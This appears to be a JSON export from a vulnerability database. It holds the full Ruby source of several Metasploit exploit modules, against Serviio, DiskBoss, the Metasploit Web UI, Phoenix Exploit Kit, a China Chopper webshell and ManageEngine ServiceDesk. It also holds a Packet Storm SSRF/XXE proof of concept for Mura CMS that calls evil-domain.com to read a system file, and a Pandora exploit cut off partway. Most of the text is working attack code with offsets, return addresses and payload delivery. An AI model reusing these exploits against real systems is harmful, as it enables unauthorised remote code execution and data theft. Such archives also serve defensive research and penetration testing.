in a call to cmd.exe resulting in execution of arbitrary commands. This module has been tested successfully on Serviio Media Server versions 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.\n", "modified": "2019-01-10T19:19:14", "published": "2017-05-05T07:54:00", "id": "MSF:EXPLOIT/WINDOWS/HTTP/SERVIIO_CHECKSTREAMURL_CMD_EXEC", "href": "", "type": "metasploit", "title": "Serviio Media Server checkStreamUrl Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n HttpFingerprint = { :pattern => [ /Restlet-Framework/ ] }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Serviio Media Server checkStreamUrl Command Execution',\n 'Description' => %q{\n This module exploits an unauthenticated remote command execution vulnerability\n in the console component of Serviio Media Server versions 1.4 to 1.8 on\n Windows operating systems.\n\n The console service (on port 23423 by default) exposes a REST API which\n which does not require authentication.\n\n The 'action' API endpoint does not sufficiently sanitize user-supplied data\n in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is\n used in a call to cmd.exe resulting in execution of arbitrary commands.\n\n This module has been tested successfully on Serviio Media Server versions\n 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>', # Discovery and exploit\n 'bcoles', # Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '41961'],\n ['PACKETSTORM', '142387'],\n ['URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php'],\n ['URL', 'https://blogs.securiteam.com/index.php/archives/3094']\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Automatic Targeting', { 'auto' => true }]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'May 3 2017',\n 'DefaultTarget' => 0))\n register_options([ Opt::RPORT(23423) ])\n end\n\n def check\n res = execute_command('')\n\n unless res\n vprint_error 'Connection failed'\n return CheckCode::Unknown\n end\n\n if res.headers['Server'] !~ /Serviio/\n vprint_status 'Target is not a Serviio Media Server'\n return CheckCode::Safe\n end\n\n if res.headers['Server'] !~ /Windows/\n vprint_status 'Target operating system is not vulnerable'\n return CheckCode::Safe\n end\n\n if res.code != 200 || res.body !~ %r{<errorCode>603</errorCode>}\n vprint_status 'Unexpected reply'\n return CheckCode::Safe\n end\n\n if res.headers['Server'] =~ %r{Serviio/(1\\.[4-8])}\n vprint_status \"#{peer} Serviio Media Server version #{$1}\"\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def execute_command(cmd, opts = {})\n data = { 'name' => 'checkStreamUrl', 'parameter' => ['VIDEO', \"\\\" &#{cmd}&\"] }\n send_request_cgi('uri' => normalize_uri(target_uri.path, 'rest', 'action'),\n 'method' => 'POST',\n 'ctype' => 'application/json',\n 'data' => data.to_json)\n end\n\n def exploit\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable') unless check == CheckCode::Appears\n execute_cmdstager(:temp => '.', :linemax => 8000)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb"}, {"lastseen": "2019-11-23T14:31:02", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.\n", "modified": "2017-12-08T16:42:43", "published": "2017-01-07T18:44:38", "id": "MSF:EXPLOIT/WINDOWS/HTTP/DISKBOSS_GET_BOF", "href": "", "type": "metasploit", "title": "DiskBoss Enterprise GET Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Seh\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DiskBoss Enterprise GET Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'vportal', # Vulnerability discovery and PoC\n 'Ahmad Mahfouz', # Vulnerability discovery and PoC\n 'Gabor Seljan', # Metasploit module\n 'Jacob Robles' # Metasploit module\n ],\n 'References' =>\n [\n ['EDB', '40869'],\n ['EDB', '42395']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\",\n 'Space' => 2000\n },\n 'Targets' =>\n [\n [\n 'Automatic Targeting',\n {\n 'auto' => true\n }\n ],\n [\n 'DiskBoss Enterprise v7.4.28',\n {\n 'Offset' => 2471,\n 'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]\n }\n ],\n [\n 'DiskBoss Enterprise v7.5.12',\n {\n 'Offset' => 2471,\n 'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]\n }\n ],\n [\n 'DiskBoss Enterprise v8.2.14',\n {\n 'Offset' => 2496,\n 'Ret' => 0x1002A8CA # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Dec 05 2016',\n 'DefaultTarget' => 0))\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n if res.body =~ /DiskBoss Enterprise v(7\\.4\\.28|7\\.5\\.12|8\\.2\\.14)/\n return Exploit::CheckCode::Vulnerable\n elsif res.body =~ /DiskBoss Enterprise/\n return Exploit::CheckCode::Detected\n end\n else\n vprint_error('Unable to determine due to a HTTP connection timeout')\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n mytarget = target\n\n if target['auto']\n mytarget = nil\n\n print_status('Automatically detecting the target...')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n if res.body =~ /DiskBoss Enterprise v7\\.4\\.28/\n mytarget = targets[1]\n elsif res.body =~ /DiskBoss Enterprise v7\\.5\\.12/\n mytarget = targets[2]\n elsif res.body =~ /DiskBoss Enterprise v8\\.2\\.14/\n mytarget = targets[3]\n end\n end\n\n if !mytarget\n fail_with(Failure::NoTarget, 'No matching target')\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n end\n\n case mytarget\n when targets[1], targets[2]\n sploit = make_nops(21)\n sploit << payload.encoded\n sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)\n sploit << [mytarget.ret].pack('V')\n sploit << rand_text_alpha(2500)\n when targets[3]\n seh = generate_seh_record(mytarget.ret)\n sploit = payload.encoded\n sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)\n sploit[sploit.length, seh.length] = seh\n sploit << make_nops(10)\n sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode\n sploit << rand_text_alpha(5000 - sploit.length)\n else\n fail_with(Failure::NoTarget, 'No matching target')\n end\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => sploit\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/diskboss_get_bof.rb"}, {"lastseen": "2019-11-24T06:42:08", "bulletinFamily": "exploit", "description": "This module exploits the \"diagnostic console\" feature in the Metasploit Web UI to obtain a reverse shell. The diagnostic console is able to be enabled or disabled by an administrator on Metasploit Pro and by an authenticated user on Metasploit Express and Metasploit Community. When enabled, the diagnostic console provides access to msfconsole via the web interface. An authenticated user can then use the console to execute shell commands. NOTE: Valid credentials are required for this module. Tested against: Metasploit Community 4.1.0, Metasploit Community 4.8.2, Metasploit Community 4.12.0\n", "modified": "2017-07-24T13:26:21", "published": "2016-09-09T10:28:13", "id": "MSF:EXPLOIT/MULTI/HTTP/METASPLOIT_WEBUI_CONSOLE_COMMAND_EXECUTION", "href": "", "type": "metasploit", "title": "Metasploit Web UI Diagnostic Console Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Metasploit Web UI Diagnostic Console Command Execution',\n 'Description' => %q{\n This module exploits the \"diagnostic console\" feature in the Metasploit\n Web UI to obtain a reverse shell.\n\n The diagnostic console is able to be enabled or disabled by an\n administrator on Metasploit Pro and by an authenticated user on\n Metasploit Express and Metasploit Community. When enabled, the\n diagnostic console provides access to msfconsole via the web interface.\n An authenticated user can then use the console to execute shell\n commands.\n\n NOTE: Valid credentials are required for this module.\n\n Tested against:\n\n Metasploit Community 4.1.0,\n Metasploit Community 4.8.2,\n Metasploit Community 4.12.0\n },\n 'Author' => [ 'Justin Steven' ], # @justinsteven\n 'License' => MSF_LICENSE,\n 'Privileged' => true,\n 'Arch' => ARCH_CMD,\n 'Payload' => { 'PayloadType' => 'cmd' },\n 'Targets' =>\n [\n [ 'Unix',\n {\n 'Platform' => [ 'unix' ]\n }\n ],\n [ 'Windows',\n {\n 'Platform' => [ 'windows' ]\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Aug 23 2016'\n ))\n\n register_options(\n [\n OptBool.new('SSL', [ true, 'Use SSL', true ]),\n OptPort.new('RPORT', [ true, '', 3790 ]),\n OptString.new('TARGETURI', [ true, 'Metasploit Web UI base path', '/' ]),\n OptString.new('USERNAME', [ true, 'The user to authenticate as' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\n ])\n end\n\n def do_login()\n\n print_status('Obtaining cookies and authenticity_token')\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login'),\n })\n\n unless res\n fail_with(Failure::NotFound, 'Failed to retrieve login page')\n end\n\n unless res.headers.include?('Set-Cookie') && res.body =~ /name=\"authenticity_token\"\\W+.*\\bvalue=\"([^\"]*)\"/\n fail_with(Failure::UnexpectedReply, \"Couldn't find cookies or authenticity_token. Is TARGETURI set correctly?\")\n end\n\n authenticity_token = $1\n session = res.get_cookies\n\n print_status('Logging in')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'user_sessions'),\n 'cookie' => session,\n 'vars_post' =>\n {\n 'utf8' => '\\xE2\\x9C\\x93',\n 'authenticity_token' => authenticity_token,\n 'user_session[username]' => datastore['USERNAME'],\n 'user_session[password]' => datastore['PASSWORD'],\n 'commit' => 'Sign in'\n }\n })\n\n unless res\n fail_with(Failure::NotFound, 'Failed to log in')\n end\n\n return res.get_cookies, authenticity_token\n\n end\n\n def get_console_status(session)\n\n print_status('Getting diagnostic console status and profile_id')\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'settings'),\n 'cookie' => session,\n })\n\n unless res\n fail_with(Failure::NotFound, 'Failed to get diagnostic console status or profile_id')\n end\n\n unless res.body =~ /\\bid=\"profile_id\"\\W+.*\\bvalue=\"([^\"]*)\"/\n fail_with(Failure::UnexpectedReply, 'Failed to get profile_id')\n end\n\n profile_id = $1\n\n if res.body =~ /<input\\W+.*\\b(id=\"allow_console_access\"\\W+.*\\bchecked=\"checked\"|checked=\"checked\"\\W+.*\\bid=\"allow_console_access\")/\n console_status = true\n elsif res.body =~ /<input\\W+.*\\bid=\"allow_console_access\"/\n console_status = false\n else\n fail_with(Failure::UnexpectedReply, 'Failed to get diagnostic console status')\n end\n\n print_good(\"Console is currently: #{console_status ? 'Enabled' : 'Disabled'}\")\n\n return console_status, profile_id\n\n end\n\n def set_console_status(session, authenticity_token, profile_id, new_console_status)\n print_status(\"#{new_console_status ? 'Enabling' : 'Disabling'} diagnostic console\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'settings', 'update_profile'),\n 'cookie' => session,\n 'vars_post' =>\n {\n 'utf8' => '\\xE2\\x9C\\x93',\n '_method' => 'patch',\n 'authenticity_token' => authenticity_token,\n 'profile_id' => profile_id,\n 'allow_console_access' => new_console_status,\n 'commit' => 'Update Settings'\n }\n })\n\n unless res\n fail_with(Failure::NotFound, 'Failed to set status of diagnostic console')\n end\n\n end\n\n def get_container_id(session, container_label)\n\n container_label_singular = container_label.gsub(/s$/, \"\")\n\n print_status(\"Getting ID of a valid #{container_label_singular}\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, container_label),\n 'cookie' => session,\n })\n\n unless res && res.body =~ /\\bid=\"#{container_label_singular}_([^\"]*)\"/\n print_warning(\"Failed to get a valid #{container_label_singular} ID\")\n return\n end\n\n container_id = $1\n\n vprint_good(\"Got: #{container_id}\")\n\n container_id\n\n end\n\n def get_console(session, container_label, container_id)\n\n print_status('Creating a console, getting its ID and authenticity_token')\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, container_label, container_id, 'console'),\n 'cookie' => session,\n })\n\n unless res && res.headers['location']\n fail_with(Failure::UnexpectedReply, 'Failed to get a console ID')\n end\n\n console_id = res.headers['location'].split('/')[-1]\n\n vprint_good(\"Got console ID: #{console_id}\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, container_label, container_id, 'consoles', console_id),\n 'cookie' => session,\n })\n\n unless res && res.body =~ /console_init\\('console', 'console', '([^']*)'/\n fail_with(Failure::UnexpectedReply, 'Failed to get console authenticity_token')\n end\n\n console_authenticity_token = $1\n\n return console_id, console_authenticity_token\n\n end\n\n def run_command(session, container_label, console_authenticity_token, container_id, console_id, command)\n\n print_status('Running payload')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, container_label, container_id, 'consoles', console_id),\n 'cookie' => session,\n 'vars_post' =>\n {\n 'read' => 'yes',\n 'cmd' => command,\n 'authenticity_token' => console_authenticity_token,\n 'last_event' => '0',\n '_' => ''\n }\n })\n\n unless res\n fail_with(Failure::NotFound, 'Failed to run command')\n end\n\n end\n\n def exploit\n\n session, authenticity_token = do_login()\n\n original_console_status, profile_id = get_console_status(session)\n\n unless original_console_status\n set_console_status(session, authenticity_token, profile_id, true)\n end\n\n if container_id = get_container_id(session, \"workspaces\")\n # target calls them \"workspaces\"\n container_label = \"workspaces\"\n elsif container_id = get_container_id(session, \"projects\")\n # target calls them \"projects\"\n container_label = \"projects\"\n else\n fail_with(Failure::Unknown, 'Failed to get workspace ID or project ID. Cannot continue.')\n end\n\n console_id, console_authenticity_token = get_console(session, container_label,container_id)\n\n run_command(session, container_label, console_authenticity_token,\n container_id, console_id, payload.encoded)\n\n unless original_console_status\n set_console_status(session, authenticity_token, profile_id, false)\n end\n\n handler\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/metasploit_webui_console_command_execution.rb"}, {"lastseen": "2019-11-26T19:07:52", "bulletinFamily": "exploit", "description": "This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader, silently installing malware if found.\n", "modified": "2017-07-24T13:26:21", "published": "2016-08-19T13:29:55", "id": "MSF:EXPLOIT/MULTI/HTTP/PHOENIX_EXEC", "href": "", "type": "metasploit", "title": "Phoenix Exploit Kit Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Phoenix Exploit Kit Remote Code Execution',\n 'Description' => %q{\n This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via geoip.php. The\n Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the\n presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader,\n silently installing malware if found.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CrashBandicot', #initial discovery by @DosPerl\n 'Jay Turla' #msf module by @shipcod3\n ],\n 'References' =>\n [\n [ 'EDB', '40047' ],\n [ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit\n [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ]\n ],\n 'Privileged' => false,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'Automatic', {} ]\n ],\n 'DisclosureDate' => 'Jul 01 2016',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php'])\n ])\n end\n\n def check\n test = Rex::Text.rand_text_alpha(8)\n res = http_send_command(\"echo \\\"#{test}\\\";\")\n if res && res.body.include?(test)\n return Exploit::CheckCode::Vulnerable\n end\n Exploit::CheckCode::Safe\n end\n\n def exploit\n encoded = Rex::Text.encode_base64(payload.encoded)\n http_send_command(\"eval(base64_decode(\\\"#{encoded}\\\"));\")\n end\n\n def http_send_command(cmd)\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => {\n 'bdr' => cmd\n }\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/phoenix_exec.rb"}, {"lastseen": "2019-11-07T17:19:18", "bulletinFamily": "exploit", "description": "This module takes advantage of the China Chopper Webshell that is commonly used by Chinese hackers.\n", "modified": "2017-07-24T13:26:21", "published": "2015-11-02T08:54:18", "id": "MSF:EXPLOIT/MULTI/HTTP/CAIDAO_PHP_BACKDOOR_EXEC", "href": "", "type": "metasploit", "title": "China Chopper Caidao PHP Backdoor Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'China Chopper Caidao PHP Backdoor Code Execution',\n 'Description' => %q{\n This module takes advantage of the China Chopper Webshell that is\n commonly used by Chinese hackers.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Nixawk'],\n 'References' =>\n [\n ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],\n ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],\n ['URL', 'https://www.us-cert.gov/ncas/alerts/TA15-313A']\n ],\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['Automatic', {}]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 27 2015',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path of backdoor', '/caidao.php']),\n OptString.new('PASSWORD', [true, 'The password of backdoor', 'chopper'])\n ])\n end\n\n def http_send_command(code)\n code = \"eval(base64_decode(\\\"#{Rex::Text.encode_base64(code)}\\\"));\"\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_post' => {\n \"#{datastore['PASSWORD']}\" => code\n }\n })\n end\n\n def check\n flag = Rex::Text.rand_text_alpha(16)\n res = http_send_command(\"printf(\\\"#{flag}\\\");\")\n if res && res.body =~ /#{flag}/m\n Exploit::CheckCode::Vulnerable\n else\n Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n print_status(\"Sending exploit...\")\n http_send_command(payload.raw)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/caidao_php_backdoor_exec.rb"}, {"lastseen": "2019-11-26T06:50:42", "bulletinFamily": "exploit", "description": "This module exploits a file upload vulnerability in ManageEngine ServiceDesk Plus. The vulnerability exists in the FileUploader servlet which accepts unauthenticated file uploads. This module has been tested successfully on versions v9 b9000 - b9102 in Windows and Linux. The MSP versions do not expose the vulnerable servlet.\n", "modified": "2017-07-24T13:26:21", "published": "2015-10-02T15:04:05", "id": "MSF:EXPLOIT/MULTI/HTTP/MANAGEENGINE_SD_UPLOADER", "href": "", "type": "metasploit", "title": "ManageEngine ServiceDesk Plus Arbitrary File Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine ServiceDesk Plus Arbitrary File Upload',\n 'Description' => %q{\n This module exploits a file upload vulnerability in ManageEngine ServiceDesk Plus.\n The vulnerability exists in the FileUploader servlet which accepts unauthenticated\n file uploads. This module has been tested successfully on versions v9 b9000 - b9102\n in Windows and Linux. The MSP versions do not expose the vulnerable servlet.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'ZDI', '15-396 ' ],\n [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/6038' ]\n ],\n 'DefaultOptions' => { 'WfsDelay' => 30 },\n 'Privileged' => false, # Privileged on Windows but not on Linux targets\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'ServiceDesk Plus v9 b9000 - b9102 / Java Universal', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Aug 20 2015'))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptInt.new('SLEEP',\n [true, 'Seconds to sleep while we wait for EAR deployment', 15]),\n ])\n end\n\n\n def check\n res = send_request_cgi({\n 'uri' => \"/\",\n 'method' => 'GET'\n })\n\n if res && res.code == 200 &&\n res.body.to_s =~ /src='\\/scripts\\/Login\\.js\\?([0-9]+)'><\\/script>/\n build = $1\n if build < \"9103\" && build > \"9000\"\n return Exploit::CheckCode::Appears\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n\n def exploit\n jboss_path = '../../server/default/deploy'\n servlet_path = rand_text_alphanumeric(4 + rand(16 - 4)) + \".up\"\n\n # First we generate the WAR with the payload...\n war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))\n war_payload = payload.encoded_war({ :app_name => war_app_base })\n\n # ... and then we create an EAR file with it.\n ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))\n app_xml = %Q{<?xml version=\"1.0\" encoding=\"UTF-8\"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + \".war\"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}\n\n # Zipping with CM_STORE to avoid errors while decompressing the zip\n # in the Java vulnerable application\n ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)\n ear_file.add_file(war_app_base + \".war\", war_payload.to_s)\n ear_file.add_file(\"META-INF/application.xml\", app_xml)\n ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + \".ear\"\n\n # Linux doesn't like it when we traverse non existing directories,\n # so let's create them by sending some random data before the EAR.\n rand_file = rand_text_alphanumeric(4 + rand(32 - 4))\n res = send_request_cgi({\n 'uri' => normalize_uri(servlet_path),\n 'method' => 'POST',\n 'data' => rand_text_alphanumeric(4 + rand(32 - 4)),\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'uniqueId' => rand_text_numeric(4 + rand(4)),\n 'module' => '',\n 'qqfile' => rand_file\n }\n })\n\n print_status(\"Uploading EAR file...\")\n res = send_request_cgi({\n 'uri' => normalize_uri(servlet_path),\n 'method' => 'POST',\n 'data' => ear_file.pack,\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'uniqueId' => rand_text_numeric(4 + rand(4)),\n 'module' => jboss_path,\n 'qqfile' => ear_file_name\n }\n })\n\n if res && res.code == 200\n print_good(\"Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s +\n \" seconds for deployment\")\n register_files_for_cleanup(jboss_path.gsub('../../','../') + \"/null/\" + ear_file_name)\n register_files_for_cleanup(\"Attachments/null/\" + rand_file)\n sleep(datastore['SLEEP'])\n else\n fail_with(Failure::Unknown, \"#{peer} - EAR upload failed\")\n end\n\n send_request_cgi({\n 'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\n 'method' => 'GET'\n })\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/manageengine_sd_uploader.rb"}], "packetstorm": [{"lastseen": "2017-10-27T14:05:49", "bulletinFamily": "exploit", "description": "", "modified": "2017-10-26T00:00:00", "published": "2017-10-26T00:00:00", "href": "https://packetstormsecurity.com/files/144764/Mura-CMS-Server-Side-Request-Forgery-XXE-Injection.html", "id": "PACKETSTORM:144764", "type": "packetstorm", "title": "Mura CMS Server-Side Request Forgery / XXE Injection", "sourceData": "`# Exploit Title: Mura CMS before 6.2 SSRF + XXE \n# Date: 30-10-2017 \n# Exploit Author: Anthony Cole \n# Vendor Homepage: http://www.getmura.com/ \n# Version: before 6.2 \n# Contact: http://twitter.com/acole76 \n# Website: http://twitter.com/acole76 \n# Tested on: Windows 2008 w/ Coldfusion 8 \n# CVE: CVE-2017-15639 \n# Category: webapps \n \n1. Description \n \nAny user can cause Mura CMS before version 6.2 to make a http request. As an added bonus, the response from that HTTP GET request is passed directly to XmlParse(). It is possible to read a file from the file system using an XXE attack. \n \n \n2. Proof of Concept \n \nvulnerable file is on github, line 50: \nhttps://github.com/blueriver/MuraCMS/blob/c8753ce80373eca302c6d9d8a02ff63a1d308991/tasks/feed/readRSS.cfm \n \nhttp://www.target.tld/tasks/feed/readRSS.cfm?siteid=SITENAMEHERE&rssurl=http://evil-domain.com/file.xml&MAXRSSITEMS=500 \n \nExplanation of params \nsiteid - The siteid can be obtained by viewing the html source code of the target home page and searching \"siteid\". \nrssurl - This is the URL you want Mura CMS to call out to. \n \nTo perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80 \n \nThen create a file: \n \n<?xml version=\"1.0\" ?> \n<!DOCTYPE rss [ \n<!ENTITY send SYSTEM \"file:///c:\\Windows\\System32\\drivers\\etc\\hosts\"> \n]> \n \n<rss version=\"2.0\"> \n<channel> \n<title>title</title> \n<link>link</link> \n<description>description</description> \n<generator>http://www.getmura.com</generator> \n<pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate> \n<language>en-us</language> \n<item> \n<title>Item title</title> \n<link>http://host/</link> \n<guid isPermaLink=\"false\">00000000-0000-0000-0000000000000000</guid> \n<pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate> \n<description>&send;</description> \n</item> \n</channel> \n</rss> \n \n3. Solution: \n \ndelete readRSS.cfm from the server. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144764/muracms-ssrfxxe.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-05T22:12:28", "bulletinFamily": "exploit", "description": "", "modified": "2015-01-07T00:00:00", "published": "2015-01-07T00:00:00", "href": "https://packetstormsecurity.com/files/129830/Pandora-3.1-Auth-Bypass-Arbitrary-File-Upload.html", "id": "PACKETSTORM:129830", "type": "packetstorm", "title": "Pandora 3.1 Auth Bypass / Arbitrary File Upload", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability\", \n'Description' => %q{ \nThis module exploits an authentication bypass vulnerability in Pandora v3.1 as \ndisclosed by Juan Galiana Lara. It also integrates with the built-in pandora \nupload which allows a user to upload arbitrary files to the '/images/' directory. \n \nThis module was created as an exercise in the Metasploit Mastery Class at Blackhat \nthat was facilitated by egypt and mubix. \n \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Juan Galiana Lara', # Vulnerability discovery \n'Raymond Nunez 